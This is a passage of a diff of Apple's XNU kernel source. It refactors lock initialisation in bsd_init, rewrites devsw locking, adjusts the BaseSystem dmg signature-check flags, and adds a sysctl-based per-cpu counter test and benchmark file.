-       tty_init();
-
        /* kernel_task->proc = kernproc; */
        set_bsdtask_info(kernel_task, (void *)kernproc);
 
@@ -572,38 +542,15 @@ bsd_init(void)
        bsd_init_kprintf("calling process_name\n");
        process_name("kernel_task", kernproc);
 
-       /* allocate proc lock group attribute and group */
-       bsd_init_kprintf("calling lck_grp_attr_alloc_init\n");
-       proc_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       proc_lck_grp = lck_grp_alloc_init("proc", proc_lck_grp_attr);
-
-       proc_slock_grp = lck_grp_alloc_init("proc-slock", proc_lck_grp_attr);
-       proc_ucred_mlock_grp = lck_grp_alloc_init("proc-ucred-mlock", proc_lck_grp_attr);
-       proc_mlock_grp = lck_grp_alloc_init("proc-mlock", proc_lck_grp_attr);
-       proc_fdmlock_grp = lck_grp_alloc_init("proc-fdmlock", proc_lck_grp_attr);
-       proc_kqhashlock_grp = lck_grp_alloc_init("proc-kqhashlock", proc_lck_grp_attr);
-       proc_knhashlock_grp = lck_grp_alloc_init("proc-knhashlock", proc_lck_grp_attr);
-       proc_dirslock_grp = lck_grp_alloc_init("proc-dirslock", proc_lck_grp_attr);
-#if CONFIG_XNUPOST
-       sysctl_debug_test_stackshot_owner_grp = lck_grp_alloc_init("test-stackshot-owner-grp", LCK_GRP_ATTR_NULL);
-       sysctl_debug_test_stackshot_owner_init_mtx = lck_mtx_alloc_init(
-               sysctl_debug_test_stackshot_owner_grp,
-               LCK_ATTR_NULL);
-#endif /* !CONFIG_XNUPOST */
        /* Allocate proc lock attribute */
-       proc_lck_attr = lck_attr_alloc_init();
 
-       proc_list_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr);
-       proc_klist_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_mlock, proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr);
-       lck_spin_init(&kernproc->p_slock, proc_slock_grp, proc_lck_attr);
-       lck_rw_init(&kernproc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr);
+       lck_mtx_init(&kernproc->p_mlock, &proc_mlock_grp, &proc_lck_attr);
+       lck_mtx_init(&kernproc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr);
+       lck_mtx_init(&kernproc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr);
+       lck_spin_init(&kernproc->p_slock, &proc_slock_grp, &proc_lck_attr);
+       lck_rw_init(&kernproc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr);
 
        assert(bsd_simul_execs != 0);
-       execargs_cache_lock = lck_mtx_alloc_init(proc_lck_grp, proc_lck_attr);
        execargs_cache_size = bsd_simul_execs;
        execargs_free_count = bsd_simul_execs;
        execargs_cache = zalloc_permanent(bsd_simul_execs * sizeof(vm_offset_t),
@@ -634,10 +581,6 @@ bsd_init(void)
 
        ulock_initialize();
 
-       hostname_lck_grp = lck_grp_alloc_init("hostname", LCK_GRP_ATTR_NULL);
-       lck_mtx_init(&hostname_lock, hostname_lck_grp, LCK_ATTR_NULL);
-       lck_mtx_init(&domainname_lock, hostname_lck_grp, LCK_ATTR_NULL);
-
        /*
         * Create process 0.
         */
@@ -646,7 +589,7 @@ bsd_init(void)
        kernproc->p_pgrp = &pgrp0;
        LIST_INSERT_HEAD(PGRPHASH(0), &pgrp0, pg_hash);
        LIST_INIT(&pgrp0.pg_members);
-       lck_mtx_init(&pgrp0.pg_mlock, proc_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&pgrp0.pg_mlock, &proc_mlock_grp, &proc_lck_attr);
        /* There is no other bsd thread this point and is safe without pgrp lock */
        LIST_INSERT_HEAD(&pgrp0.pg_members, kernproc, p_pglist);
        kernproc->p_listflag |= P_LIST_INPGRP;
@@ -659,7 +602,7 @@ bsd_init(void)
        session0.s_count = 1;
        session0.s_leader = kernproc;
        session0.s_listflags = 0;
-       lck_mtx_init(&session0.s_mlock, proc_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&session0.s_mlock, &proc_mlock_grp, &proc_lck_attr);
        LIST_INSERT_HEAD(SESSHASH(0), &session0, s_hash);
        proc_list_unlock();
 
@@ -729,9 +672,6 @@ bsd_init(void)
        TAILQ_INIT(&kernproc->p_aio_doneq);
        kernproc->p_aio_total_count = 0;
 
-       bsd_init_kprintf("calling file_lock_init\n");
-       file_lock_init();
-
 #if CONFIG_MACF
        mac_cred_label_associate_kernel(kernproc->p_ucred);
 #endif
@@ -743,8 +683,8 @@ bsd_init(void)
        filedesc0.fd_knlist = NULL;
        filedesc0.fd_knhash = NULL;
        filedesc0.fd_knhashmask = 0;
-       lck_mtx_init(&filedesc0.fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr);
-       lck_mtx_init(&filedesc0.fd_knhashlock, proc_knhashlock_grp, proc_lck_attr);
+       lck_mtx_init(&filedesc0.fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr);
+       lck_mtx_init(&filedesc0.fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr);
 
        /* Create the limits structures. */
        kernproc->p_limit = &limit0;
@@ -792,9 +732,6 @@ bsd_init(void)
                }
        }
 
-       bsd_init_kprintf("calling fpxlog_init\n");
-       fpxlog_init();
-
        /*
         * Initialize buffers and hash links for buffers
         *
@@ -815,10 +752,6 @@ bsd_init(void)
        bsd_init_kprintf("calling vfsinit\n");
        vfsinit();
 
-       /* Initialize file locks. */
-       bsd_init_kprintf("calling lf_init\n");
-       lf_init();
-
 #if CONFIG_PROC_UUID_POLICY
        /* Initial proc_uuid_policy subsystem */
        bsd_init_kprintf("calling proc_uuid_policy_init()\n");
@@ -857,34 +790,12 @@ bsd_init(void)
        bsd_init_kprintf("calling aio_init\n");
        aio_init();
 
-       /* Initialize SysV shm subsystem locks; the subsystem proper is
-        * initialized through a sysctl.
-        */
-#if SYSV_SHM
-       bsd_init_kprintf("calling sysv_shm_lock_init\n");
-       sysv_shm_lock_init();
-#endif
-#if SYSV_SEM
-       bsd_init_kprintf("calling sysv_sem_lock_init\n");
-       sysv_sem_lock_init();
-#endif
-#if SYSV_MSG
-       bsd_init_kprintf("sysv_msg_lock_init\n");
-       sysv_msg_lock_init();
-#endif
-       bsd_init_kprintf("calling pshm_lock_init\n");
-       pshm_lock_init();
-       bsd_init_kprintf("calling psem_lock_init\n");
-       psem_lock_init();
-
        pthread_init();
        /* POSIX Shm and Sem */
        bsd_init_kprintf("calling pshm_cache_init\n");
        pshm_cache_init();
        bsd_init_kprintf("calling psem_cache_init\n");
        psem_cache_init();
-       bsd_init_kprintf("calling time_zone_slock_init\n");
-       time_zone_slock_init();
        bsd_init_kprintf("calling select_waitq_init\n");
        select_waitq_init();
 
@@ -920,6 +831,10 @@ bsd_init(void)
        kernproc->p_fd->fd_cdir = NULL;
        kernproc->p_fd->fd_rdir = NULL;
 
+#if defined (__x86_64__) && (DEBUG || DEVELOPMENT)
+       hvg_bsd_init();
+#endif /* DEBUG || DEVELOPMENT */
+
 #if CONFIG_FREEZE
 #ifndef CONFIG_MEMORYSTATUS
     #error "CONFIG_FREEZE defined without matching CONFIG_MEMORYSTATUS"
@@ -935,18 +850,12 @@ bsd_init(void)
        memorystatus_init();
 #endif /* CONFIG_MEMORYSTATUS */
 
-       bsd_init_kprintf("calling acct_init\n");
-       acct_init();
-
        bsd_init_kprintf("calling sysctl_mib_init\n");
        sysctl_mib_init();
 
        bsd_init_kprintf("calling bsd_autoconf\n");
        bsd_autoconf();
 
-       bsd_init_kprintf("calling os_reason_init\n");
-       os_reason_init();
-
 #if CONFIG_DTRACE
        dtrace_postinit();
 #endif
@@ -1057,9 +966,9 @@ bsd_init(void)
        (void)vnode_ref(init_rootvnode);
        (void)vnode_put(init_rootvnode);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        set_rootvnode(init_rootvnode);
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
        init_rootvnode = NULLVP;  /* use rootvnode after this point */
 
 
@@ -1176,6 +1085,7 @@ bsd_init(void)
        if (bsdmgroot_bootable()) {
                int error;
                bool rooted_dmg = false;
+               bool skip_signature_check = false;
 
                printf("trying to find and mount BaseSystem dmg as root volume\n");
 #if DEVELOPMENT || DEBUG
@@ -1188,7 +1098,7 @@ bsd_init(void)
                        panic("%s: M_NAMEI zone exhausted", __FUNCTION__);
                }
 
-               error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg);
+               error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg, &skip_signature_check);
                if (error) {
                        bsd_init_kprintf("failed to to find BaseSystem dmg: error = %d\n", error);
                } else {
@@ -1196,7 +1106,7 @@ bsd_init(void)
 
                        bsd_init_kprintf("found BaseSystem dmg at: %s\n", dmgpath);
 
-                       error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg);
+                       error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg, skip_signature_check);
                        if (error) {
                                bsd_init_kprintf("couldn't mount BaseSystem dmg: error = %d", error);
                        }
@@ -1246,9 +1156,6 @@ bsd_init(void)
        consider_zone_gc(FALSE);
 #endif
 
-       /* Initialize System Override call */
-       init_system_override();
-
        bsd_init_kprintf("done\n");
 }
 
@@ -1361,6 +1268,9 @@ bsd_utaskbootstrap(void)
                panic("bsd_utaskbootstrap: initproc not set\n");
        }
 #endif
+
+       zalloc_first_proc_made();
+
        /*
         * Since we aren't going back out the normal way to our parent,
         * we have to drop the transition locks explicitly.
@@ -1475,12 +1385,6 @@ parse_bsd_args(void)
        }
 #endif
 
-#if OS_REASON_DEBUG
-       if (PE_parse_boot_argn("-disable_osreason_debug", namep, sizeof(namep))) {
-               os_reason_debug_disabled = 1;
-       }
-#endif
-
        PE_parse_boot_argn("sigrestrict", &sigrestrict_arg, sizeof(sigrestrict_arg));
 
 #if DEVELOPMENT || DEBUG
@@ -1585,20 +1489,26 @@ extern const char *IOGetBootObjectsPath(void);
 // BaseSystem.dmg into its argument (which must be a char[MAXPATHLEN]).
 static
 int
-bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
+bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check)
 {
        int error;
        size_t len;
        char *dmgbasepath;
        char *dmgpath;
+       bool allow_rooted_dmg = false;
 
        dmgbasepath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK);
        dmgpath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK);
        vnode_t imagevp = NULLVP;
 
+#if DEVELOPMENT || DEBUG
+       allow_rooted_dmg = true;
+#endif
+
        //must provide output bool
-       if (rooted_dmg) {
+       if (rooted_dmg && skip_signature_check) {
                *rooted_dmg = false;
+               *skip_signature_check = false;
        } else {
                error = EINVAL;
                goto done;
@@ -1615,6 +1525,11 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                goto done;
        }
 
+       if (csr_check(CSR_ALLOW_ANY_RECOVERY_OS) == 0) {
+               *skip_signature_check = true;
+               allow_rooted_dmg = true;
+       }
+
 #if defined(__arm64__)
        const char *boot_obj_path = IOGetBootObjectsPath();
        if (boot_obj_path) {
@@ -1634,26 +1549,27 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                        goto done;
                }
 
-#if DEVELOPMENT || DEBUG
-               len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
-               if (len > MAXPATHLEN) {
-                       error = ENAMETOOLONG;
-                       goto done;
-               }
+               if (allow_rooted_dmg) {
+                       len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
+                       if (len > MAXPATHLEN) {
+                               error = ENAMETOOLONG;
+                               goto done;
+                       }
 
-               len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN);
-               if (len > MAXPATHLEN) {
-                       error = ENAMETOOLONG;
-                       goto done;
-               }
+                       len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN);
+                       if (len > MAXPATHLEN) {
+                               error = ENAMETOOLONG;
+                               goto done;
+                       }
 
-               error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
-               if (error == 0) {
-                       *rooted_dmg = true;
-                       goto done;
+                       error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
+                       if (error == 0) {
+                               *rooted_dmg = true;
+                               *skip_signature_check = true;
+                               goto done;
+                       }
+                       memset(dmgpath, 0, MAXPATHLEN);
                }
-               memset(dmgpath, 0, MAXPATHLEN);
-#endif  // DEVELOPMENT || DEBUG
 
                len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
                if (len > MAXPATHLEN) {
@@ -1688,27 +1604,28 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                goto done;
        }
 
-#if DEVELOPMENT || DEBUG
-       // Try BaseSystem.rooted.dmg
-       len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
-       if (len > MAXPATHLEN) {
-               error = ENAMETOOLONG;
-               goto done;
-       }
+       if (allow_rooted_dmg) {
+               // Try BaseSystem.rooted.dmg
+               len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
+               if (len > MAXPATHLEN) {
+                       error = ENAMETOOLONG;
+                       goto done;
+               }
 
-       len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN);
-       if (len > MAXPATHLEN) {
-               error = ENAMETOOLONG;
-               goto done;
-       }
+               len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN);
+               if (len > MAXPATHLEN) {
+                       error = ENAMETOOLONG;
+                       goto done;
+               }
 
-       error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
-       if (error == 0) {
-               // we found it! success!
-               *rooted_dmg = true;
-               goto done;
+               error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
+               if (error == 0) {
+                       // we found it! success!
+                       *rooted_dmg = true;
+                       *skip_signature_check = true;
+                       goto done;
+               }
        }
-#endif // DEVELOPMENT || DEBUG
 
        // Try BaseSystem.dmg
        len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
index 3b8290fc5be72ed64f4e282a32bf395832ac9f90..a08f4c823d86ab2585b9f79ef00ef7814b7a38eb 100644 (file)
 
 /* XXX these should be in a common header somwhere, but aren't */
 extern int chrtoblk_set(int, int);
-extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *);
 
 /* XXX most of these just exist to export; there's no good header for them*/
 void pcb_synch(void);
 
-TAILQ_HEAD(, devsw_lock) devsw_locks;
-lck_mtx_t devsw_lock_list_mtx;
-lck_grp_t * devsw_lock_grp;
+typedef struct devsw_lock {
+       TAILQ_ENTRY(devsw_lock) dl_list;
+       thread_t                dl_thread;
+       dev_t                   dl_dev;
+       int                     dl_mode;
+       int                     dl_waiters;
+} *devsw_lock_t;
+
+static LCK_GRP_DECLARE(devsw_lock_grp, "devsw");
+static LCK_MTX_DECLARE(devsw_lock_list_mtx, &devsw_lock_grp);
+static TAILQ_HEAD(, devsw_lock) devsw_locks = TAILQ_HEAD_INITIALIZER(devsw_locks);
 
 /* Just to satisfy pstat command */
 int dmmin, dmmax, dmtext;
 
-vm_offset_t
-kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err)
-{
-       vm_offset_t addr = 0;
-       kern_return_t kr = KERN_SUCCESS;
-
-       if (!physContig) {
-               kr = kernel_memory_allocate(mbmap, &addr, size, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
-       } else {
-               kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
-       }
-
-       if (kr != KERN_SUCCESS) {
-               addr = 0;
-       }
-       if (err) {
-               *err = kr;
-       }
-
-       return addr;
-}
-
 /*
  * XXX this function only exists to be exported and do nothing.
  */
@@ -366,72 +351,84 @@ bsd_hostname(char *buf, size_t bufsize, size_t *len)
        return ret;
 }
 
+static devsw_lock_t
+devsw_lock_find_locked(dev_t dev, int mode)
+{
+       devsw_lock_t lock;
+
+       TAILQ_FOREACH(lock, &devsw_locks, dl_list) {
+               if (lock->dl_dev == dev && lock->dl_mode == mode) {
+                       return lock;
+               }
+       }
+
+       return NULL;
+}
+
 void
 devsw_lock(dev_t dev, int mode)
 {
-       devsw_lock_t newlock, tmplock;
-       int res;
+       devsw_lock_t newlock, curlock;
 
        assert(0 <= major(dev) && major(dev) < nchrdev);
        assert(mode == S_IFCHR || mode == S_IFBLK);
 
-       MALLOC(newlock, devsw_lock_t, sizeof(struct devsw_lock), M_TEMP, M_WAITOK | M_ZERO);
+       newlock = kalloc_flags(sizeof(struct devsw_lock), Z_WAITOK | Z_ZERO);
        newlock->dl_dev = dev;
        newlock->dl_thread = current_thread();
        newlock->dl_mode = mode;
 
        lck_mtx_lock_spin(&devsw_lock_list_mtx);
-retry:
-       TAILQ_FOREACH(tmplock, &devsw_locks, dl_list)
-       {
-               if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) {
-                       res = msleep(tmplock, &devsw_lock_list_mtx, PVFS, "devsw_lock", NULL);
-                       assert(res == 0);
-                       goto retry;
-               }
+
+       curlock = devsw_lock_find_locked(dev, mode);
+       if (curlock == NULL) {
+               TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list);
+       } else {
+               curlock->dl_waiters++;
+               lck_mtx_sleep_with_inheritor(&devsw_lock_list_mtx,
+                   LCK_SLEEP_SPIN, curlock, curlock->dl_thread,
+                   THREAD_UNINT | THREAD_WAIT_NOREPORT,
+                   TIMEOUT_WAIT_FOREVER);
+               assert(curlock->dl_thread == current_thread());
+               curlock->dl_waiters--;
        }
 
-       TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list);
        lck_mtx_unlock(&devsw_lock_list_mtx);
+
+       if (curlock != NULL) {
+               kfree(newlock, sizeof(struct devsw_lock));
+       }
 }
+
 void
 devsw_unlock(dev_t dev, int mode)
 {
-       devsw_lock_t tmplock;
+       devsw_lock_t lock;
+       thread_t inheritor_thread = NULL;
 
        assert(0 <= major(dev) && major(dev) < nchrdev);
 
        lck_mtx_lock_spin(&devsw_lock_list_mtx);
 
-       TAILQ_FOREACH(tmplock, &devsw_locks, dl_list)
-       {
-               if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) {
-                       break;
-               }
-       }
+       lock = devsw_lock_find_locked(dev, mode);
 
-       if (tmplock == NULL) {
-               panic("Trying to unlock, and couldn't find lock.");
+       if (lock == NULL || lock->dl_thread != current_thread()) {
+               panic("current thread doesn't own the lock (%p)", lock);
        }
 
-       if (tmplock->dl_thread != current_thread()) {
-               panic("Trying to unlock, but I don't hold the lock.");
+       if (lock->dl_waiters) {
+               wakeup_one_with_inheritor(lock, THREAD_AWAKENED,
+                   LCK_WAKE_DEFAULT, &lock->dl_thread);
+               inheritor_thread = lock->dl_thread;
+               lock = NULL;
+       } else {
+               TAILQ_REMOVE(&devsw_locks, lock, dl_list);
        }
 
-       wakeup(tmplock);
-       TAILQ_REMOVE(&devsw_locks, tmplock, dl_list);
-
        lck_mtx_unlock(&devsw_lock_list_mtx);
 
-       FREE(tmplock, M_TEMP);
-}
-
-void
-devsw_init()
-{
-       devsw_lock_grp = lck_grp_alloc_init("devsw", NULL);
-       assert(devsw_lock_grp != NULL);
-
-       lck_mtx_init(&devsw_lock_list_mtx, devsw_lock_grp, NULL);
-       TAILQ_INIT(&devsw_locks);
+       if (inheritor_thread) {
+               thread_deallocate(inheritor_thread);
+       }
+       kfree(lock, sizeof(struct devsw_lock));
 }
diff --git a/bsd/kern/counter_test.c b/bsd/kern/counter_test.c
new file mode 100644 (file)
index 0000000..db9f8ee
--- /dev/null
@@ -0,0 +1,280 @@
+/* * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/* sysctl interface for testing percpu counters in DEBUG or DEVELOPMENT kernel only. */
+#if !(DEVELOPMENT || DEBUG)
+#error "Counter testing is not enabled on RELEASE configurations"
+#endif
+
+#include <sys/sysctl.h>
+#include <kern/counter.h>
+#include <machine/atomic.h>
+#include <libkern/libkern.h>
+#include <machine/machine_routines.h>
+#include <kern/cpu_data.h>
+
+#include <os/log.h>
+
+#ifdef CONFIG_XNUPOST
+#include <tests/xnupost.h>
+#endif /* CONFIG_XNUPOST */
+
+static _Atomic boolean_t scalable_counter_test_running = FALSE;
+scalable_counter_t test_scalable_counter;
+
+SCALABLE_COUNTER_DEFINE(test_static_scalable_counter);
+
+#ifdef CONFIG_XNUPOST
+kern_return_t counter_tests(void);
+/*
+ * Sanity test that a counter can be modified before zalloc is initialized.
+ */
+static void
+bump_static_counter(void* arg)
+{
+       (void) arg;
+       counter_inc(&test_static_scalable_counter);
+}
+
+STARTUP_ARG(PMAP_STEAL, STARTUP_RANK_MIDDLE, bump_static_counter, NULL);
+
+kern_return_t
+counter_tests()
+{
+       T_ASSERT_EQ_ULLONG(counter_load(&test_static_scalable_counter), 1, "Counter was incremented");
+       return KERN_SUCCESS;
+}
+#endif /* CONFIG_XNUPOST */
+
+static int
+sysctl_scalable_counter_test_start SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int ret_val = 1;
+       int error = 0;
+       boolean_t exclusive;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       /* The test doesn't support being run multiple times in parallel. */
+       exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, FALSE, TRUE, seq_cst);
+       if (!exclusive) {
+               os_log(OS_LOG_DEFAULT, "scalable_counter_test: Caught attempt to run the test in parallel.");
+               return EINVAL;
+       }
+       counter_alloc(&test_scalable_counter);
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_test_finish SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       boolean_t exclusive;
+       int ret_val = 0;
+       int error = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       /* The test doesn't support being run multiple times in parallel. */
+       exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, TRUE, FALSE, seq_cst);
+       if (!exclusive) {
+               /* Finish called without start. */
+               return EINVAL;
+       }
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_add SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int64_t value = 0;
+       int error = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       counter_add(&test_scalable_counter, value);
+       return 0;
+}
+
+static int
+sysctl_static_scalable_counter_add SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int64_t value = 0;
+       int error = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       counter_add(&test_static_scalable_counter, value);
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       value = counter_load(&test_scalable_counter);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+static int
+sysctl_scalable_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               counter_inc(&test_scalable_counter);
+       }
+       return 0;
+}
+
+static volatile uint64_t racy_counter;
+
+static int
+sysctl_racy_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               racy_counter++;
+       }
+       return 0;
+}
+
+static int
+sysctl_racy_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value = racy_counter;
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+static _Atomic uint64_t atomic_counter;
+
+static int
+sysctl_atomic_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               os_atomic_add(&atomic_counter, 1, relaxed);
+       }
+       return 0;
+}
+
+static int
+sysctl_atomic_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value = os_atomic_load_wide(&atomic_counter, relaxed);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_start,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_test_start, "I", "Setup per-cpu counter test");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_finish,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_test_finish, "I", "Finish per-cpu counter test");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_add,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_add, "I", "Perform an add on the per-cpu counter");
+
+SYSCTL_PROC(_kern, OID_AUTO, static_scalable_counter_test_add,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_static_scalable_counter_add, "I", "Perform an add on the static per-cpu counter");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_load,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_load, "I", "Load the current per-cpu counter value.");
+
+SYSCTL_SCALABLE_COUNTER(_kern, static_scalable_counter_test_load,
+    test_static_scalable_counter, "Load the current static per-cpu counter value.");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_write_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_write_benchmark, "I", "Per-cpu counter write benchmark");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_racy_counter_write_benchmark, "I", "Global counter racy benchmark");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_load,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_racy_counter_load, "I", "Global counter racy load");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_write_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_atomic_counter_write_benchmark, "I", "Atomic counter write benchmark");
+
